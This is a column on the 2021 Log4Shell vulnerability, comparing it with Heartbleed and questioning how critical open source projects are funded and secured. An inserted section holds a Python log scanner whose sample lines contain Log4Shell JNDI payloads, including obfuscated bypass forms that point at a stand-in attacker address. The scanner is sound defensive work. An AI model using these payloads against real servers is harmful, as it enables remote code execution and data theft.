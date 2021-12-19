



A serious security vulnerability is discovered in open source software that is widely used behind the scenes on the internet but little known to the average person, and it can give attackers access to a treasure trove of sensitive data.

The incident shows how a vulnerability in a seemingly simple piece of infrastructure code can threaten the security of banks, tech companies, governments, and just about any other type of organization.

Businesses are rushing to fix the problem, but fear it will affect the internet for years to come.

It sounds like Log4Shell, the hitherto unknown flaw in a ubiquitous, free program that has scared experts since its discovery last week, doesn’t it? Yes, but it also describes a weirdly similar episode from 2014. Remember Heartbleed?

Heartbleed was a bug in OpenSSL, the most popular open source library implementing the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols that encrypt traffic for websites and other software.

The flaw, which allowed attackers to trick a vulnerable web server into sending them chunks of its memory, including private encryption keys and other confidential information, was linked to several attacks, including one against a major US hospital operator that resulted in the theft of 4.5 million health records. Researchers from Google and the Finnish security company Codenomicon independently discovered the vulnerability and reported it in April 2014.

After Heartbleed was disclosed, the world wondered how such a flaw could have lurked unnoticed for years in software so essential to the secure functioning of the Internet. For many, the incident also raised questions about the security of all open source software.

Fast forward to December 2021 and those same questions are surfacing.

Like OpenSSL, Log4j, the Java library affected by the Log4Shell bug, is a widely used cross-platform open source component. Developed and maintained under the auspices of the volunteer-run Apache Software Foundation, Log4j is a logging library that Java applications use to record events such as user activity and errors so that they can be analyzed later by security or development teams.

The flaw lets an attacker who can get a specially crafted string into any message the application logs make the server fetch and execute code from a location the attacker controls, so hackers could use it to steal sensitive information from all sorts of devices, launch ransomware attacks, and take over machines to mine cryptocurrency. The vulnerability came to wide public attention almost by accident, when Microsoft announced that it had found suspicious activity in Minecraft: Java Edition, a popular video game it owns.
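As an added illustration (not part of the original column, and not code from the Log4j project), here is a small Python detector that checks web-server access log lines for the Log4Shell trigger. Log4j 2.x expands `${...}` lookups inside the text it logs, so an attacker plants `${jndi:ldap://attacker-host/...}` in a field the server logs (a User-Agent header, a chat message) and the server reaches out to the attacker's host and runs what it gets back. Scanners that grep for the literal string `${jndi:` miss the nested lookups attackers used to hide it, such as `${${lower:j}ndi:...}` or `${${::-j}${::-n}${::-d}${::-i}:...}`, so this example first resolves the `lower`, `upper` and default-value (`:-`) lookups the way Log4j's own substitution does, from the innermost lookup outward, and only then matches. It deliberately does not resolve lookups whose value depends on the target machine (`env:`, `sys:`, `date:`), so it leaves those in place. The log lines, addresses and payloads are constructed for the example.

```python
import re

# Innermost ${...} lookup: no nested "${" or "}" inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# The trigger Log4j 2.x acts on: a lookup whose prefix is "jndi". Log4j
# lowercases the prefix before matching it, so the check is case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _lookup(var):
    """Resolve the lookups an offline detector can evaluate; None if it can't."""
    prefix, _, arg = var.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    return None  # env:, sys:, date:, ... depend on the target; left unresolved


def _resolve(match):
    """Substitute one innermost lookup as Log4j's StrSubstitutor would."""
    expr = match.group(1)
    if expr.partition(":")[0].lower() == "jndi":
        return match.group(0)  # the payload itself: keep it for the detector
    var, has_default, default = expr.partition(":-")  # ${var:-default}
    value = _lookup(var)
    if value is not None:
        return value
    if has_default:
        return default  # an unresolvable variable falls back to its default
    return match.group(0)  # unknown lookup with no default: leave as-is


def normalize(text, max_rounds=32):
    """Expand nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):  # bounded so a nesting bomb cannot spin forever
        expanded = INNER_LOOKUP.sub(_resolve, text)
        if expanded == text:
            break
        text = expanded
    return text


def is_log4shell(text):
    """True if the text carries a JNDI lookup once obfuscation is undone."""
    return bool(JNDI_LOOKUP.search(normalize(text)))


def naive_scan(lines):
    """What a grep for the literal trigger finds: only unobfuscated payloads."""
    return [i for i, line in enumerate(lines) if JNDI_LOOKUP.search(line)]


def scan(lines):
    """Indices of lines flagged after normalization."""
    return [i for i, line in enumerate(lines) if is_log4shell(line)]


# Constructed access-log lines (hypothetical hosts, documentation IP ranges).
# The User-Agent field is one place attackers commonly planted the payload.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 318 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 318 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/b}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${env:NOPE:-j}ndi:ldap://198.51.100.7/c}"',
    '10.0.0.12 - - [10/Dec/2021:14:02:21 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 22 "-" "curl/7.79"',
]

if __name__ == "__main__":
    print("literal grep flags lines:", naive_scan(SAMPLE_LINES))  # [1]
    print("normalized scan flags lines:", scan(SAMPLE_LINES))     # [1, 2, 3, 4]
    for i in scan(SAMPLE_LINES):
        print(i, "->", normalize(SAMPLE_LINES[i]))
```

The benign `${date:yyyy}` on the last line is kept unflagged on purpose: a `${` alone is not evidence of attack, and a detector that fires on every lookup drowns the real hits in noise. Resolving `env:` or `sys:` values is impossible without the target's environment, which is why any rule that looks only at the raw string can be bypassed and why patching or removing the JNDI lookup class is the real fix.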

Jen Easterly, Director of the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, said: “To be clear, this vulnerability poses a serious risk. We urge all organizations to join us in this essential effort and take action.”

Like Heartbleed, Log4Shell illustrates how the prevalence of open source software in businesses around the world, programs like OpenSSL and Log4j and the multitude of code that depends on them in modern software development, has increasingly made it a favorite target of attack.

Almost all organizations now use some amount of open source, thanks to advantages such as lower cost compared to proprietary software and flexibility in a world increasingly dominated by cloud computing. Open source isn’t going away anytime soon, quite the contrary, and hackers know it.

As for what Log4Shell says about open source security, I think it raises more questions than it answers. I generally agree that open source software has security benefits because of the many watchful eyes of all those contributors around the world who are committed to the quality and safety of the programs. But a few questions are fair to ask:

Who guards the gates when it comes to securing fundamental programs like Log4j? The Apache Software Foundation says it has over 8,000 contributors collaborating on 350 projects and initiatives, but how many are paid to keep tabs on an older, perhaps boring, one like Log4j?

Should big companies with deep pockets, beyond Google, which always seems to be heavily involved in such issues, be doing more to support the cause with people and resources?

And, finally, why does it always seem like it takes a vulnerability disclosure in an open source program before the world realizes how critical that program is? Is the industry doing enough to recognize what these software packages are and prioritize their security?

Log4Shell, like Heartbleed before it, demonstrates that, if nothing else, these questions need to be asked and answered.

Justin Dorfman is the open source program manager at cybersecurity company Reblaze.

